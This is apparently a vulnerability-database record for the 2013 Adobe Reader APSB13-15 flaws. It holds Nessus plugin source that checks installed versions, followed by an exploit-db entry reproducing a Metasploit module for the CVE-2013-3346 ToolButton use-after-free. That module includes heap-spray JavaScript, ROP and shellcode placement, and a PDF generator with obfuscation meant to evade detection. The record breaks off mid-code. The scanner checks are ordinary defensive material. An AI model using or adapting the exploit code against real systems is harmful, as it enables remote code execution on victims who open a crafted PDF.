script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\npath = get_kb_item_or_exit('SMB/Acrobat/Path');\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe Acrobat\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:33", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66410", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66410);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) audit(AUDIT_KB_MISSING, 'SMB/Acroread/Version');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\n\nif (info2)\n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:50:36", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to\n bypass the Adobe Reader", "modified": "2019-11-02T00:00:00", "id": "MACOSX_ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/nessus/66411", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66411);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-105\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-106\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-212\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to\n bypass the Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - A flaw exists in the JavaScript API that allows an\n attacker to obtain sensitive information.\n (CVE-2013-2737)\n\n - An unspecified stack overflow condition exists that\n allows an attacker to execute arbitrary code.\n (CVE-2013-2724)\n\n - Multiple unspecified buffer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2730, CVE-2013-2733)\n\n - Multiple unspecified integer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists due to improper handling of operating\n system domain blacklists. An attacker can exploit this\n to have an unspecified impact. (CVE-2013-3342)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\"))\n audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (!get_kb_item(\"Host/MacOSX/Version\"))\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp = \"Adobe Reader\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5)\n)\n fix = \"9.5.5\";\nelse if (\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7)\n)\n fix = \"10.1.7\";\nelse if (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n fix = \"11.0.3\";\nelse\n fix = \"\";\n\nif (fix)\n{\n info =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:info, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T12:17:54", "bulletinFamily": "exploit", "description": "Adobe Reader ToolButton - Use After Free. CVE-2013-3346. Remote exploit for windows platform", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "id": "EDB-ID:30394", "href": "https://www.exploit-db.com/exploits/30394/", "type": "exploitdb", "title": "Adobe Reader ToolButton - Use After Free", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 08 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status(\"Sending PDF...\")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n\r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n\r\n js = %Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape(\"%u0c0c\");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\r\n return;\r\n}\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\nvar executable = \"\";\r\nvar rop10 = unescape(\"#{rop_10}\");\r\nvar rop11 = unescape(\"#{rop_11}\");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n\r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n\r\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape(\"%u08e4%u0c0c\");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape(\"%ua8df%u4a82\");\r\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape(\"%u08a8%u0c0c\");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape(\"%u8003%u4a84\");\r\n} else {\r\n vulnerable = false;\r\n}\r\n\r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n\r\n var part1 = \"\";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\r\n }\r\n part1 += rop_addr;\r\n var part2 = \"\";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\r\n var arr = new Array();\r\n\r\n removeButtonFunc = function () {\r\n app.removeToolButton({\r\n cName: \"evil\"\r\n });\r\n\r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n\r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: \"xxx\",\r\n cExec: \"1\",\r\n cEnable: \"removeButtonFunc();\"\r\n });\r\n }\r\n\r\n app.addToolButton({\r\n cName: \"evil\",\r\n cExec: \"1\",\r\n cEnable: \"addButtonFunc();\"\r\n });\r\n}\r\n|\r\n\r\n js\r\n end\r\n\r\n def RandomNonASCIIString(count)\r\n result = \"\"\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n\r\n def ioDef(id)\r\n \"%d 0 obj \\n\" % id\r\n end\r\n\r\n def ioRef(id)\r\n \"%d 0 R\" % id\r\n end\r\n\r\n\r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = \"\"\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << \"#%x\" % c.unpack(\"C*\")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n\r\n\r\n def ASCIIHexWhitespaceEncode(str)\r\n result = \"\"\r\n whitespace = \"\"\r\n str.each_byte do |b|\r\n result << whitespace << \"%02x\" % b\r\n whitespace = \" \" * (rand(3) + 1)\r\n end\r\n result << \">\"\r\n end\r\n\r\n\r\n def make_pdf(js)\r\n xref = []\r\n eol = \"\\n\"\r\n endobj = \"endobj\" << eol\r\n\r\n # Randomize PDF version?\r\n pdf = \"%PDF-1.5\" << eol\r\n pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Catalog\") << eol\r\n pdf << nObfu(\"/OpenAction \") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu(\"/AcroForm \") << ioRef(6) << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol\r\n pdf << nObfu(\"/Count 1\") << eol\r\n pdf << nObfu(\"/Type /Pages\") << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Page\") << eol\r\n pdf << nObfu(\">>\") << eol # end obj dict\r\n pdf << endobj\r\n\r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu(\"<<\")\r\n pdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5)\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << compressed << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n\r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n\r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # form stream\r\n xfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n\r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << xfa << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n\r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n\r\n\r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << \"xref\" << eol\r\n pdf << \"0 %d\" % (xref.length + 1) << eol\r\n pdf << \"0000000000 65535 f\" << eol\r\n xref.each do |index|\r\n pdf << \"%010d 00000 n\" % index << eol\r\n end\r\n\r\n pdf << \"trailer\" << eol\r\n pdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n pdf << \"startxref\" << eol\r\n pdf << 